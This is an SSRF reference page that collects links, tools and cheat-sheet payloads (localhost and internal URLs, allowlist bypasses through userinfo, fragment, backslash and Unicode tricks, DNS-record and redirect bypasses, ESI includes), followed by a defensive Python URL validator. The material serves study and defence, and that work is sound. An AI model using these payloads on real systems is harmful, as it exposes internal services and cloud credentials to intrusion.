SSRF

What is it?

Exploitation

Bypass SSRF Protection using Domain CNAME A Record: https://www.hahwul.com/2019/02/bypass-ssrf-protection-using-domain-cname-arecord.html

Bypass SSRF Protection using HTTP Redirect: https://www.hahwul.com/2019/02/bypass-ssrf-protection-using-http-redirect.html

Payloads

SSRF Payloads for AWS: https://github.com/cybercdh/hacks/blob/master/ssrf_payloads/aws

Tools

Gopherus: https://github.com/tarunkant/Gopherus

  • This tool generates Gopher payloads for exploiting SSRF (Server Side Request Forgery) to gain RCE (Remote Code Execution); it can also help obtain a reverse shell on the target server.

Cheat Sheet

Basic Attack [ref1]

?url=http://localhost/server-status
?url=http://127.0.0.1/server-status
?url=http://internal_domain/page
?url=http://internal_ip(192.138.0.14)/page

Bypass SSRF with special char [ref1]

?url=http://allow_domain.internal_domain_or_ip/page
?url=http://allow_domain@internal_domain_or_ip/page
?url=http://internal_domain_or_ip#.allow_domain/page
?url=http://internal_domain_or_ip?.allow_domain/page
?url=http://internal_domain_or_ip\.allow_domain/page
?url=https://ⓦⓦⓦ.ⓗⓐⓗⓦⓤⓛ.ⓒⓞⓜ  (normalizes to www.hahwul.com)

[ List ]
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ 
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

Bypass SSRF Domain CNAME & A-Record [ref1]

[ CNAME ]
http://localhost.hahwul.com/server-status

$ nslookup localhost.hahwul.com
localhost.hahwul.com    canonical name = localhost.
Name:    localhost
Address: 127.0.0.1


[ A-Record ]
http://127.hahwul.com/server-status

Bypass SSRF HTTP Redirect [ref1]

?url=http://your-domain/r.php

[ r.php ]
<?php
header('Location: http://127.0.0.1:8080/server-status');
?>

SSRF with ESI (Edge Side Includes) [ref1]

<esi:include src="http://127.0.0.1/server-status"/>
<esi:include src="http://internal_domain/server_base_csrf_page"/>
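Every trick in the sections above (userinfo, '#', '?' and '\' inside the host, enclosed-alphanumeric hostnames, subdomains whose CNAME or A record points at loopback, a redirect to 127.0.0.1, and an ESI include) exploits the gap between the string a filter inspects and the host the HTTP client actually connects to. The following Python validator is an added example, not code from this page or from hahwul's cheat sheet; it closes that gap by parsing the URL the way a client does, NFKC-folding the host, resolving it, and re-running the same check on every redirect hop and on every ESI src. FAKE_DNS, FAKE_REDIRECTS and the example.test allowlist are constructed assumptions so that it runs offline; in production the resolver hook would be socket.getaddrinfo and the redirect table would be the server's Location headers.

```python
import ipaddress
import re
import unicodedata
from urllib.parse import urlsplit

# Constructed stand-in for DNS so the example runs offline (assumption, not real
# records). The names mirror the cheat sheet's tricks: a subdomain whose CNAME is
# localhost, an A record pointing at loopback, and an IPv4-mapped IPv6 loopback.
FAKE_DNS = {
    "www.example.test": ["203.0.113.10"],
    "localhost.example.test": ["127.0.0.1"],
    "127.example.test": ["127.0.0.1"],
    "metadata.example.test": ["169.254.169.254"],
    "v6.example.test": ["::ffff:127.0.0.1"],
}
# Constructed redirect table standing in for the Location headers a server sends.
FAKE_REDIRECTS = {
    "http://www.example.test/r": "http://127.0.0.1:8080/server-status",
    "http://www.example.test/old": "http://www.example.test/new",
}
ALLOWED_SUFFIX = "example.test"  # hypothetical allowlist: the application's own zone
MAX_REDIRECTS = 5
# Explicit deny list. ipaddress's is_private is broader and also flags the
# 203.0.113.0/24 documentation range used for the sample above.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]
HOST_RE = re.compile(r"^[a-z0-9.:-]+$")
ESI_SRC_RE = re.compile(r"""<esi:include\s+src=["']?([^\s"'>]+)""", re.I)


def fake_resolve(host):
    """Resolver hook; swap in socket.getaddrinfo for real lookups."""
    return FAKE_DNS.get(host, [])


def canonical_host(raw_host):
    """NFKC-fold the host (so ⓦⓦⓦ becomes www), lowercase it, drop a trailing dot."""
    return unicodedata.normalize("NFKC", raw_host).lower().rstrip(".")


def is_blocked_ip(ip):
    """True for loopback, RFC 1918, CGNAT, link-local and IPv6-local addresses."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    return ip.is_multicast or ip.is_unspecified or any(ip in n for n in BLOCKED_NETWORKS)


def check_url(url, resolver=fake_resolve):
    """Return (allowed, detail); detail is the canonical host when allowed."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL"  # the allow_domain@internal form
    if not parts.hostname:
        return False, "missing host"
    # urlsplit ends the host at '#', '?' and '/', so internal#.allow_domain and
    # internal?.allow_domain are seen as just 'internal'; validate that, not the raw string.
    host = canonical_host(parts.hostname)
    if not HOST_RE.match(host):
        return False, "invalid host characters"  # e.g. a backslash inside the host
    try:
        addresses = [ipaddress.ip_address(host)]  # literal IP, nothing to resolve
    except ValueError:
        if host != ALLOWED_SUFFIX and not host.endswith("." + ALLOWED_SUFFIX):
            return False, "host not in allowlist"
        addresses = [ipaddress.ip_address(a) for a in resolver(host)]
        if not addresses:
            return False, "host does not resolve"
    for ip in addresses:  # every record counts: the name must not resolve anywhere internal
        if is_blocked_ip(ip):
            return False, "resolves to blocked address " + str(ip)
    return True, host


def fetch_with_policy(url, redirects=FAKE_REDIRECTS, resolver=fake_resolve):
    """Re-validate every hop instead of letting the HTTP client follow Location blindly."""
    for _ in range(MAX_REDIRECTS + 1):
        allowed, detail = check_url(url, resolver)
        if not allowed:
            return None, "%s rejected: %s" % (url, detail)
        nxt = redirects.get(url)
        if nxt is None:
            return url, "ok"  # a real client would issue the request here
        url = nxt
    return None, "too many redirects"


def esi_include_findings(body, resolver=fake_resolve):
    """List (src, detail) for each <esi:include> whose src fails the same URL check."""
    return [(src, check_url(src, resolver)[1]) for src in ESI_SRC_RE.findall(body)
            if not check_url(src, resolver)[0]]
```

Two design points matter beyond what the code shows. First, the allowlist is deliberately a suffix match so that localhost.example.test and 127.example.test pass the name check and are caught only by the resolved-address check: a domain allowlist on its own does not stop the CNAME and A-record variants. Second, the address validated here must be the address the client connects to; if the HTTP library performs its own lookup at connect time, a record with a short TTL can return a different answer (DNS rebinding), so either pin the checked IP into the connection or perform this check inside the library's connect hook.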

Other Resources

Hahwul's SSRF cheatsheet: https://www.hahwul.com/p/ssrf-open-redirect-cheat-sheet.html?m=1

This script takes a domain name and a callback server, parses links, appends SSRF parameters and fires the requests: https://gist.github.com/hussein98d/d09b5990ff339dac8029b1e9248d2875

References

[ref1] : https://www.hahwul.com/p/ssrf-open-redirect-cheat-sheet.html?m=1
